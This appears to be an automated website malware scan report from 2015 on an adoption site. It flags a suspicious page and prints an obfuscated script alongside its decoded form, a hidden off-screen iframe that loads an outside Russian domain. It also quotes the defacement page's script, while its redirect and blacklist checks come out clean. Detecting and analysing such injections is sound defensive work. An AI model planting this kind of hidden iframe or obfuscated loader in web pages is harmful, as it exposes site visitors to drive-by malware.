Scanned pages/files
Request | Server response | Status |
http://www.adoption-match.com/ | 200 OK Content-Length: 11887 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://www.adoption-match.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 18 Sep 2015 13:03:31 GMT Location: http://adoption-match.com/test404page.js/ Server: nginx/1.8.0 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://adoption-match.com/xmlrpc.php | clean |
http://adoption-match.com/test404page.js/ | 200 OK Content-Length: 17427 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02) ...[622 bytes skipped]... Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;"><iframe style="width:100%;height:100%" width="100%" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://mobi-avto.ru/z/gamma"></iframe></div> | ||
http://adoption-match.com/ | 200 OK Content-Length: 11887 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: You Got Hacked By A_Ghacker ...[703 bytes skipped]... root" /> <meta name="copyright" content="msfconsole_meta"/> <meta name="description" content="msfconsole_meta"/> <body oncontextmenu="return false" onkeydown="return false"> <script language="JavaScript"> function tb5_makeArray(n){ this.length = n; return this.length; } tb5_messages = new tb5_makeArray(5); tb5_messages[0] = "You Got Hacked By A_Ghacker"; tb5_messages[1] = "We are arab Hackers"; tb5_messages[2] = "We Love Hacking!"; tb5_messages[3] = "Gray Hat Hacker Here!"; tb5_messages[4] = "Don't Worry"; tb5_messages[5] = "Your DataBase Is Safe"; tb5_messages[6] = "We just want to inform you that your site security is low ."; tb5_messages[7] = "Fixed it as soon possible, or else other hacker will hacked your system !"; tb5_rptType = 'infinite'; tb5_rptNbr = 10; tb5_speed = ...[12070 bytes skipped]... | ||
http://adoption-match.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 18 Sep 2015 13:03:36 GMT Location: http://adoption-match.com/test404page.js/ Server: nginx/1.8.0 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://adoption-match.com/xmlrpc.php | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: adoption-match.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Sep 2015 13:03:35 GMT
Accept-Ranges: bytes
Server: nginx/1.8.0
Content-Length: 11887
Content-Type: text/html
Last-Modified: Mon, 10 Aug 2015 14:14:36 GMT
...11887 bytes of data.
GET / HTTP/1.1
Host: adoption-match.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Sep 2015 13:03:35 GMT
Accept-Ranges: bytes
Server: nginx/1.8.0
Content-Length: 11887
Content-Type: text/html
Last-Modified: Mon, 10 Aug 2015 14:14:36 GMT
...11887 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: adoption-match.com
Referer: http://www.google.com/search?q=adoption-match.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: adoption-match.com
Referer: http://www.google.com/search?q=adoption-match.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=adoption-match.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://adoption-match.com/
Result: adoption-match.com is not infected or malware details are not published yet.
Result: adoption-match.com is not infected or malware details are not published yet.